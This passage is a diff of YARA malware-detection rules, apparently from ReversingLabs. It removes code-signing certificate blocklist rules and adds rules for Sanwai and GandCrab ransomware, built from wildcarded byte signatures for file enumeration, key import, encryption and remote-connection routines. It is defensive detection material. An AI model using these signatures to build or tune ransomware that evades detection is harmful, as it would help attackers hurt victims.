+            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
+            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Edouard Roulet (W7J9LRHXTG)" and pe.signatures [ i ] . serial == "12:72:51:b3:2b:9a:50:bd" and 1493769599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_48Cad4E6966E22D6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sanwai : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing OSX DokSpy backdoor."
+		description = "Yara rule that detects Sanwai ransomware."
 		author = "ReversingLabs"
-		id = "22d62d7e-3f76-5f6b-a3f1-a6b087fb63e2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "01912621-4a34-5e34-8542-5b561e8da567"
+		date = "2021-11-11"
+		modified = "2021-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2176-L2192"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7733b8a97d9f3538db04309a2e3f9df6cb64930b0b6f7f241c3e629be2dd7804"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sanwai.yara#L1-L71"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a7a95b2403fe539dce0d856cc1c04d15440677ea39c0a22e818b42333a64e92c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sanwai"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Seven Muller (FUP9692NN6)" and pe.signatures [ i ] . serial == "48:ca:d4:e6:96:6e:22:d6" and 1492732799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5E15205F180442Cc6C3C0F03E1A33D9F : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "4a0d995a-37df-52a4-a66f-4bc6c290c10a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2194-L2210"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1ca238b5da4ff9940425c99f55542c931ccdf0ea3b0a2acbf00ffbbb54171ae0"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
+            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
+            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
+            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8
+            ?? ?? ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ??
+            85 C0 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
+            5F 5E 5B 8B E5 5D C3 83 F8 ?? 75 ?? 8B 4D ?? D1 E9 F6 C1 ?? B9 ?? ?? ?? ?? 0F 45 C1
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 B8 ?? ?? ?? ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
+        }
+		$import_key = {
+            8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 85
+            C0 75 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 32 C0 5F 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ??
+            83 C4 ?? C3 8B 44 24 ?? FF 74 24 ?? 8B 08 8B 40 ?? 89 47 ?? 8D 44 24 ?? 50 57 6A ??
+            6A ?? 6A ?? FF 74 24 ?? 89 0F FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ??
+            FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? B0 ?? 5F 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$encrypt_files = {
+            8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ??
+            8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ??
+            1B C0 83 C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CF E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 8D 4D ?? 8B
+            9D ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 CB ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 83 CB ?? 83 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 43 4D ?? 83
+            7D ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 01 3B
+            02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? 8A 41 ??
+            3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? 1B C0 83
+            C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B
+            CF 50 E8 ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 81 CB ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 5D ??
+            83 FB ?? 0F 43 CF 83 7D ?? ?? 0F 85
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ziber Ltd" and pe.signatures [ i ] . serial == "5e:15:20:5f:18:04:42:cc:6c:3c:0f:03:e1:a3:3d:9f" and 1498607999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4C8E3B1613F73542F7106F272094Eb23 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gandcrab : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects GandCrab ransomware."
 		author = "ReversingLabs"
-		id = "06f79efe-134e-5941-80fe-3b6482ac9668"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a09ed7e6-f3a6-5f44-9d5b-a9c529cf1190"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2212-L2228"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "15c21b783409d904a0b4971dbdcbd0740083d13f3c633ee77c87df46d3aca748"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.GandCrab.yara#L1-L892"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "79381635681482fc90defe4e10e97bf16d534837518fc06ae579822e9d77b461"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GandCrab"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADD Audit" and pe.signatures [ i ] . serial == "4c:8e:3b:16:13:f7:35:42:f7:10:6f:27:20:94:eb:23" and 1472687999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_2Ce2Bd0Ad3Cfde9Ea73Eec7Ca30400Da : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
+	strings:
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 85 DB 74 ?? 33 C0
+            83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
+            57 FF 15 ?? ?? ?? ?? 8D 4D ?? 8D 34 45 ?? ?? ?? ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
+            8B D8 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? FF D6 57 53 FF D6
+            6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8B 35 ?? ?? ?? ?? 53 FF D6 33 FF 8D
+            85 ?? ?? ?? ?? 21 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 83 EC ??
+            FF 75 ?? 53 FF D6 8B 75 ?? 8D 4D ?? 50 53 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
+            C0 74 ?? 47 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 83 65 ?? ?? E8 ?? ?? ?? ?? 85 C0 74
+            ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v2 = {
+            55 8B EC 83 EC ?? 53 56 8B D9 89 55 ?? 57 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45
+            ?? ?? ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8
+            FF D6 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15
+            ?? ?? ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F
+            7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
+            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF
+            15 ?? ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83
+            EC ?? 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 8B 75 ?? 8D 4D ?? 68 ?? ??
+            ?? ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55
+            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89
+            01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ??
+            FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ??
+            ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$crypt_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 51 33 C0 89 4C 24 ?? 40 8B DA 50 51 50
+            83 EC ?? 89 5C 24 ?? 50 51 50 51 50 51 50 51 50 83 EC ?? 50 51 50 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8B
+            F8 03 F3 8D 4E ?? 8D 0C CF C1 E1 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 04 B7 8D 04 C5
+            ?? ?? ?? ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 89 44 24 ?? 8D 0C F5 ?? ?? ?? ??
+            51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 0C DD ?? ?? ?? ?? 8B F8 51 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 8B D8 89 5C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF
+            75 ?? 8D 0C 36 8B 35 ?? ?? ?? ?? 89 4C 24 ?? FF D6 8B 4C 24 ?? 8D 04 09 89 44 24 ??
+            8D 44 24 ?? 50 53 68 ?? ?? ?? ?? 51 FF 74 24 ?? FF D6 53 8B 1D ?? ?? ?? ?? FF D3 57
+            8B F0 FF D3 83 C0 ?? 8D 4C 24 ?? 03 C6 50 E8 ?? ?? ?? ?? 57 FF D3 40 8D 4C 24 ?? 50
+            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 F6
+            89 44 24 ?? 8B CE 57 89 4C 24 ?? FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24
+            ?? 8A 0C 38 80 F9 ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 40 57 89 44 24 ?? FF
+            D3 8B 4C 24 ?? 8B 54 24 ?? 3B C8 72 ?? 8B 7C 24 ?? 57 FF D3 85 C0 74 ?? 8B 4C 24 ??
+            89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C
+            24 ?? 3B F0 72 ?? 8B 7C 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 8B 35 ?? ??
+            ?? ?? 57 FF D6 8D 4C 24 ?? 8D 3C 47 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF
+            D6 FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34
+            47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 57 FF D3 8B 74 24 ?? 8B 1D ?? ?? ?? ?? 56 FF D3 C1 E0 ?? 8D 4C 24 ??
+            83 C0 ?? 50 E8 ?? ?? ?? ?? 56 FF D3 8D 4C 24 ?? 8D 04 C5 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 56 89 44 24 ?? FF D3 8B 5C 24 ?? 8B F0 8B CB 8D 3C 36 8B D7 E8 ?? ?? ?? ?? 8D 44
+            24 ?? 8B CE 8B 74 24 ?? 50 56 68 ?? ?? ?? ?? 57 C1 E1 ?? 53 89 4C 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 FF D3 83 C0 ?? 8D 4C 24 ??
+            50 E8 ?? ?? ?? ?? 56 FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 89 44 24 ?? 33 F6 8B 44
+            24 ?? 8B FE 50 FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 ?? 8A 0C 07 80 F9
+            ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 50 47 FF D3 8B 54 24 ?? 3B F8 72 ?? 8B
+            7C 24 ?? 57 FF D3 50 FF 74 24 ?? 6A ?? 57 56 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ??
+            8D 54 24 ?? 89 74 24 ?? 8B CF E8 ?? ?? ?? ?? 59 85 C0 75 ?? 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 85 C9 74
+            ?? 8B 45 ?? 89 08 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 33 F6 46 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B
+            C6 5E 5B 8B E5 5D C3
+        }
+		$crypt_files_v2 = {
+            8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 ?? ?? ?? ?? 52
+            FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF 74 24 ??
+            FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C0 ?? 68 ?? ?? ??
+            ?? 03 F0 56 6A ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? FF D3 8B 54 24 ?? 40 85 D2 74 ?? 3B C6 73 ?? 8D 0C 02 89 44 24 ?? 89 4C
+            24 ?? 89 54 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 40 83 7C 24 ?? ?? 74 ?? 03
+            44 24 ?? 3B C6 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 F6 FF D3 85 C0 74 ?? 8B
+            7C 24 ?? EB ?? 8D 9B ?? ?? ?? ?? 8B 4C 24 ?? 8A 04 0E 3C ?? 74 ?? 3C ?? 74 ?? 88 07
+            47 51 46 FF D3 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C
+            24 ?? 90 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24
+            ?? 3B F0 72 ?? 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 56 FF 15 ?? ??
+            ?? ?? 8D 4C 24 ?? 8D 34 46 56 89 74 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 57 8B 3D ?? ?? ?? ?? FF D7 68 ?? ?? ?? ?? 6A ?? 56 FF D7 8B 74 24 ?? 68 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 FF D7 FF 74 24 ?? 8D 34 46 FF D3 50 56
+            6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? 68 ?? ?? ?? ??
+            56 FF 15 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 8D 34 46 FF D3 50 56 6A ?? 57 6A ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24
+            ?? 8B 35 ?? ?? ?? ?? FF D6 8B F8 6A ?? C1 E7 ?? 68 ?? ?? ?? ?? 83 C7 ?? 57 6A ?? FF
+            15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D6 8D 0C C5 ?? ?? ?? ?? 8B 44 24 ?? 85 C0
+            74 ?? 3B CF 73 ?? 8B F8 EB ?? 33 FF FF 74 24 ?? FF D6 8B 0D ?? ?? ?? ?? 89 44 24 ??
+            85 C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF D6 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 34 00
+            8B D6 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57
+            68 ?? ?? ?? ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 57 FF
+            D3 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D
+            48 ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33
+            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01
+            41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24
+            ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 51 8D 54 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 8B 44 24 ?? 50 FF D3 8B 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ??
+            6A ?? FF 74 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 66 89 03 83 FE ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8B 5D ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
+            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 75
+            ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 01 03 59 11 53
+            ?? 59 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 75 ?? 8B 45 ?? 33
+            C9 66 89 08 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files_v2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF D6 8D 85 ?? ?? ?? ?? 50
+            57 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0B 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? 5F 5E 5B
